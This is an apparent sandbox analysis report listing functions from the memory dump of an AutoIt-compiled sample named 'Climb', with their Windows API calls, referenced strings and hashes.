Part of subcall function 0048249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004824B0

Part of subcall function 00482234: GetWindowLongW.USER32(?,000000EB), ref: 00482242

GetParent.USER32(?), ref: 004C3440
DefDlgProcW.USER32(?,00000133,?,?,?,?), ref: 004C34CA

Strings

(U, xrefs: 004820B9

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: LongWindow$ParentProc
String ID: (U
API String ID: 2181805148-2725093197
Opcode ID: 2d5e53d514c056b16bcccc0ff5e81da5455dab381db42416b5bcd357c3efe175
Instruction ID: ca89ccfdfce1e030f1692836375c6127cbcefed4d89b5649a4f7b546d210476d
Opcode Fuzzy Hash: 2d5e53d514c056b16bcccc0ff5e81da5455dab381db42416b5bcd357c3efe175
Instruction Fuzzy Hash: C121F834201144AFCB2AAF68CD4DEAA3B66EF06364F14464AF625173F2C3798E45D719

Function 005141AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00487873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004878B1
Part of subcall function 00487873: GetStockObject.GDI32(00000011), ref: 004878C5
Part of subcall function 00487873: SendMessageW.USER32(00000000,00000030,00000000), ref: 004878CF

GetWindowRect.USER32(00000000,?), ref: 00514216
GetSysColor.USER32(00000012), ref: 00514230

Strings

static, xrefs: 005141F3

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: a9934054b58c038ba19daf98e5c3386f17be850ee1e9f74003b402aed07dd7d7
Instruction ID: 60485203002feceea45e03662a25dce989ef0f5b916cbba5ce1712bd73b30ef0
Opcode Fuzzy Hash: a9934054b58c038ba19daf98e5c3386f17be850ee1e9f74003b402aed07dd7d7
Instruction Fuzzy Hash: 9D112676610209AFEB00DFA8CC45AFA7BF8FB08314F015914F965E3250E634E890AB60

Function 004FD763 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004FD7C2
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 004FD7EB

Strings

<local>, xrefs: 004FD7AB

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: beed0ed781509acf0f324f952d4399e48a6d6dfdf719e155d837573b861cba5f
Instruction ID: 7ceb0fd8873e3b18814b023ee8dd087bbf7631c93047bf34b2513908e8ab0dfc
Opcode Fuzzy Hash: beed0ed781509acf0f324f952d4399e48a6d6dfdf719e155d837573b861cba5f
Instruction Fuzzy Hash: 9111067290123AB9D7385B628C49EF7BFDEEB127A4F104227B60986180D2689845D2F5

Function 004E75ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 0048B329: _wcslen.LIBCMT ref: 0048B333

CharUpperBuffW.USER32(?,?,?), ref: 004E761D
_wcslen.LIBCMT ref: 004E7629

Strings

STOP, xrefs: 004E7623, 004E7628

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: 2f0b9c179f7ea70e2e8d62b18099838d5603a3fe4298da56af4ccaf881a5fdb7
Instruction ID: 6c91290cafe6b0319fa7b1efa4b3db145b42c1c776eb7847f6777a471734c839
Opcode Fuzzy Hash: 2f0b9c179f7ea70e2e8d62b18099838d5603a3fe4298da56af4ccaf881a5fdb7
Instruction Fuzzy Hash: 040108329049668FCB10AFBECC409BF33B5BF60379740092AE42192291EB38D8009354

Function 004E262B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0048B329: _wcslen.LIBCMT ref: 0048B333

Part of subcall function 004E45FD: GetClassNameW.USER32(?,?,000000FF), ref: 004E4620

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 004E2699

Strings

ListBox, xrefs: 004E2663
ComboBox, xrefs: 004E2638

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: cac22806e1251763749392d34b22d7b616437e0e7682f1de51d7ed7716ef50fd
Instruction ID: 46ec84634a2eb680627c8bc586a0da9a31e57e9b5925429f43fd223974661ebe
Opcode Fuzzy Hash: cac22806e1251763749392d34b22d7b616437e0e7682f1de51d7ed7716ef50fd
Instruction Fuzzy Hash: D8019E75600214BBCB04ABA6CC51DFE77A8EB86355B000B1BA862973D2DB79580987A9

Function 004E2525 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0048B329: _wcslen.LIBCMT ref: 0048B333

Part of subcall function 004E45FD: GetClassNameW.USER32(?,?,000000FF), ref: 004E4620

SendMessageW.USER32(?,00000180,00000000,?), ref: 004E2593

Strings

ListBox, xrefs: 004E255D
ComboBox, xrefs: 004E2532

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: ea7555d9511699c2c48586466fd3ac0db821e4e7e01eae9ffd6b54699aa8cde6
Instruction ID: 5dfa71bba6d9c0026e534396ea4072db37ff1abc19fdd56bd630c2d45fc9da0d
Opcode Fuzzy Hash: ea7555d9511699c2c48586466fd3ac0db821e4e7e01eae9ffd6b54699aa8cde6
Instruction Fuzzy Hash: 2701D8756411047BCB05E752CA12EFF37A8DF46345F14041B684263281DB589E0887B6

Function 004E25A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0048B329: _wcslen.LIBCMT ref: 0048B333

Part of subcall function 004E45FD: GetClassNameW.USER32(?,?,000000FF), ref: 004E4620

SendMessageW.USER32(?,00000182,?,00000000), ref: 004E2615

Strings

ListBox, xrefs: 004E25E1
ComboBox, xrefs: 004E25B6

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 51e75179a61033d275e658df4e19d22a14ed7b34c0b16e4d510cf304cd1f2ea6
Instruction ID: 6978062aaf2966e6ab575edb0931ce38e987b5c19daee3707b67f5d8669dd305
Opcode Fuzzy Hash: 51e75179a61033d275e658df4e19d22a14ed7b34c0b16e4d510cf304cd1f2ea6
Instruction Fuzzy Hash: 6A01A776A401047ACB15F762CA01EFF77ACDB15349F54011B7802A3282DB598E09D7BA

Function 004E691E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 004E6967

Part of subcall function 004E6C29: VariantInit.OLEAUT32(00000000), ref: 004E6C91
Part of subcall function 004E6C29: VariantCopy.OLEAUT32(00000000,?), ref: 004E6C9B

VariantClear.OLEAUT32(?), ref: 004E698B

Strings

1kN, xrefs: 004E692F

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Variant$Init$ClearCopy
String ID: 1kN
API String ID: 1426616791-3448080462
Opcode ID: 7e78a8b3b685daf21d8951f9561a68ba0be1d0092a136274fdb5fc6783229737
Instruction ID: 55b5e90361734e39b5c84d90596582c35d384e0b3a466b7168a931f18c4427d7
Opcode Fuzzy Hash: 7e78a8b3b685daf21d8951f9561a68ba0be1d0092a136274fdb5fc6783229737
Instruction Fuzzy Hash: B41152718003089FC710DF9AD88489AFBF8FF18314B50892FE58697651D771E548CF54

Function 004E26B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0048B329: _wcslen.LIBCMT ref: 0048B333

Part of subcall function 004E45FD: GetClassNameW.USER32(?,?,000000FF), ref: 004E4620

SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 004E2720

Strings

ListBox, xrefs: 004E26ED
ComboBox, xrefs: 004E26C2

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 6b7f8ae4935d64e29965087abaf6427a6cc30f5dbecf003a757dca7a6b290a14
Instruction ID: a326b31d7c4eba246124c8d3923a8c271ab8d9de48a1df39e708fcb72e8453ed
Opcode Fuzzy Hash: 6b7f8ae4935d64e29965087abaf6427a6cc30f5dbecf003a757dca7a6b290a14
Instruction Fuzzy Hash: 13F0A975A402147ACB05B7A68C51FFE77ACEF06759F40091BB462A32C2DB69590CC3A9

Function 00519AFD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0048249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004824B0

DefDlgProcW.USER32(?,0000002B,?,?,?), ref: 00519B6D

Part of subcall function 00482234: GetWindowLongW.USER32(?,000000EB), ref: 00482242

SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00519B53

Strings

(U, xrefs: 00519B06

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: LongWindow$MessageProcSend
String ID: (U
API String ID: 982171247-2725093197
Opcode ID: 67a5fee2a825ce673a6eae42f0dd95cd93158bf6210a796d56a660498cdf985c
Instruction ID: e9f4c71589b850c70eb092082e763c0ffd97eddb8ae531abeaa654647825eed2
Opcode Fuzzy Hash: 67a5fee2a825ce673a6eae42f0dd95cd93158bf6210a796d56a660498cdf985c
Instruction Fuzzy Hash: 7301D430209214ABEB25AF14EC69FA63F76FF85365F100559F9020A2F0C7726885DB64

Function 004B3A62 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

Strings

j3R, xrefs: 004B3A88
2<K, xrefs: 004B3A64

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID:
String ID: 2<K$j3R
API String ID: 0-3843417852
Opcode ID: ac2812e0d4b311896624012f64442c46037940de1e616444fe2b6ca669181c40
Instruction ID: b71e8c46866b0fa37622eeb7511b669118b732ebec4c85a809c1d580cd79bb9f
Opcode Fuzzy Hash: ac2812e0d4b311896624012f64442c46037940de1e616444fe2b6ca669181c40
Instruction Fuzzy Hash: 9AF09029104149AADB149F92C840AFA73B8DB08702F20416BBC99C7290FA789F95E379

Function 00518432 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 0048249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004824B0

GetWindowLongW.USER32(?,000000F0), ref: 00518471
GetWindowLongW.USER32(?,000000EC), ref: 0051847F

Strings

(U, xrefs: 0051843E

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: LongWindow
String ID: (U
API String ID: 1378638983-2725093197
Opcode ID: 23ce9bdde7a0e183616b12459c71a7cd78b668c96a9b65c121558822ee114fd3
Instruction ID: 31388fa1f3a74b28c645e3530937db5b2239ed7f96167c5ef5bddbb9fe487921
Opcode Fuzzy Hash: 23ce9bdde7a0e183616b12459c71a7cd78b668c96a9b65c121558822ee114fd3
Instruction Fuzzy Hash: 5CF03C311012059FCB14DF68DC549AA7BB5FB96365B108A29F926873F0CB709884EB50

Function 004E1461 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004E146F

Strings

Error allocating memory., xrefs: 004E1468
AutoIt, xrefs: 004E1463

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: fafe9328f6b826402ed3f8b57ae156466e474170ffb3e75dbdfda47ce0c7f980
Instruction ID: 8ea8018130d8ff7101946f1d7265fcc61a45076f7bbb2dad941efadfc4ebd918
Opcode Fuzzy Hash: fafe9328f6b826402ed3f8b57ae156466e474170ffb3e75dbdfda47ce0c7f980
Instruction Fuzzy Hash: 46E0D83138471436D2203795AC03FD9BA949F16B69F11481FF788545C28EEB249042ED

Function 004A10B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0049FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,004A10E2,?,?,?,0048100A), ref: 0049FAD9

IsDebuggerPresent.KERNEL32(?,?,?,0048100A), ref: 004A10E6
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0048100A), ref: 004A10F5

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 004A10F0

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: a9ba5d5539ac2a2b2018d3f7974b4fa7748a3fd94faa49b7dd97bba399fbc654
Instruction ID: 2bb668155e188fe3b9fef802561b180477862779acdbfce79b70165bfc8a9818
Opcode Fuzzy Hash: a9ba5d5539ac2a2b2018d3f7974b4fa7748a3fd94faa49b7dd97bba399fbc654
Instruction Fuzzy Hash: E2E06D706003208BD320AF25E904346BFF8AF26305F018D6EE895C26A1DBBCD488CBA1

Function 0049F114 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0049F151

Strings

h5U, xrefs: 0049F146
`5U, xrefs: 0049F131

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Init_thread_footer
String ID: `5U$h5U
API String ID: 1385522511-1648001026
Opcode ID: b72848c41f26839d5e4f5b8bcc4347b9a0560d8882452498724eedccf0e5c52d
Instruction ID: fdf7685f9689d3a80bd08450806c52d44b6212814ada304e30dd787ecd02dfb1
Opcode Fuzzy Hash: b72848c41f26839d5e4f5b8bcc4347b9a0560d8882452498724eedccf0e5c52d
Instruction Fuzzy Hash: 9EE02631804A14DBCB01D72CE81298837A0FB26376F10017BE51AC7391BB2C2E4AEA9C

Function 004F39D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 004F39F0
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 004F3A05

Strings

aut, xrefs: 004F39F9

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: e3bcb488d7916da30a073da4da8f31288b6015c65e5f2f16180e43c1dae8a833
Instruction ID: 564a392dc6cbc94ccc0f20714e3d4c21b4e6f6dd616e8815459bbef99e5e3422
Opcode Fuzzy Hash: e3bcb488d7916da30a073da4da8f31288b6015c65e5f2f16180e43c1dae8a833
Instruction Fuzzy Hash: 7BD05E7650032867DA20A7659C0EFDB7B7CDB48710F0002A1BA7592091DBF4DA89CBE0

Function 00512DF2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00512E08
PostMessageW.USER32(00000000), ref: 00512E0F

Part of subcall function 004EF292: Sleep.KERNEL32 ref: 004EF30A

Strings

Shell_TrayWnd, xrefs: 00512E01

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 77256c1e19847abc895b18dbd93fb7ff93193053cf6e4daf3b0f34f01ccb08cf
Instruction ID: c2edd156bfb338bb70914bed95ffcfb275ef44683fcc88e051de0613fb620263
Opcode Fuzzy Hash: 77256c1e19847abc895b18dbd93fb7ff93193053cf6e4daf3b0f34f01ccb08cf
Instruction Fuzzy Hash: FED022313C13007BF238B370AC0FFC27B20EB24B04F5088257305AA0C0CAE46804C6A8

Function 00512DBE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00512DC8
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00512DDB

Part of subcall function 004EF292: Sleep.KERNEL32 ref: 004EF30A

Strings

Shell_TrayWnd, xrefs: 00512DC1

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 5ba66a4ec03dec4e6ff9b7aec287f074012e22a57059ca4a666063bbf0f61c14
Instruction ID: cf6b6d28418667a0676b8314d81d9566274c4210a473efd440249ffa1a4babdc
Opcode Fuzzy Hash: 5ba66a4ec03dec4e6ff9b7aec287f074012e22a57059ca4a666063bbf0f61c14
Instruction Fuzzy Hash: 6ED022353C4300BBE238B370AC0FFD27F20EF20B04F1088257309AA0C0CAE46804C6A4

